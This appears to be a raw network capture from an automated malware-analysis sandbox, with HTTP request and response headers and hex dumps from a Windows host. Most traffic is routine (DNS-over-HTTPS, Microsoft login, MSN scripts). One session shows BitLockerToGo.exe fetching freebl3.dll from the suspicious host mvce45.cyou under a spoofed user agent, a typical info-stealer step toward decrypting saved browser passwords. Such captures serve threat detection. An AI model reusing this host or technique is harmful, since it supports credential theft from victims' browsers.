                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:39 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8e617b5e292a32d3-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 a2 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  33192.168.2.84980049.13.32.954437684C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC237OUTGET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:39 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thursday, 21-Nov-2024 14:48:39 GMT
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
                                                                                                                                                                                                                                                                                                                  Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC16384INData Raw: c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8
                                                                                                                                                                                                                                                                                                                  Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]w
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC16384INData Raw: 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01
                                                                                                                                                                                                                                                                                                                  Data Ascii: }00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC16384INData Raw: 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1
                                                                                                                                                                                                                                                                                                                  Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC16384INData Raw: 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f
                                                                                                                                                                                                                                                                                                                  Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC16384INData Raw: 04 8d 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                                                                                                                                                                                                                                                  Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                                                                                                                                                                                                                                                  Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                                                                                                                                                                                                                                                  Data Ascii: ,0<48%8A)$


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                  34192.168.2.84980340.126.53.18443
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                  Content-Length: 4722
                                                                                                                                                                                                                                                                                                                  Host: login.live.com
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC4722OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                  Expires: Thu, 21 Nov 2024 14:47:40 GMT
                                                                                                                                                                                                                                                                                                                  P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                  x-ms-route-info: C516_BAY
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 1ab61bc4-c9b7-4486-91e3-ab9ecc223367
                                                                                                                                                                                                                                                                                                                  PPServer: PPV: 30 H: PH1PEPF0001B7FD V: 0
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:40 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Length: 10197
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  35192.168.2.84981123.44.203.234431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:40 UTC628OUTGET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: assets2.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC1239INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                  Content-MD5: 2o3TH2IeNXyf9OP87xu6FA==
                                                                                                                                                                                                                                                                                                                  Last-Modified: Fri, 15 Nov 2024 22:31:11 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DD05C53565F83D
                                                                                                                                                                                                                                                                                                                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 64e866d1-101e-0037-3246-3988b3000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:41 GMT
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  Akamai-Request-BC: [a=23.195.36.241,b=420501333,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                                                  Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                                                  Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                                  Akamai-Server-IP: 23.195.36.241
                                                                                                                                                                                                                                                                                                                  Akamai-Request-ID: 19105755
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                                                  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Akamai-GRN: 0.f124c317.1732200521.19105755
                                                                                                                                                                                                                                                                                                                  Vary: Origin
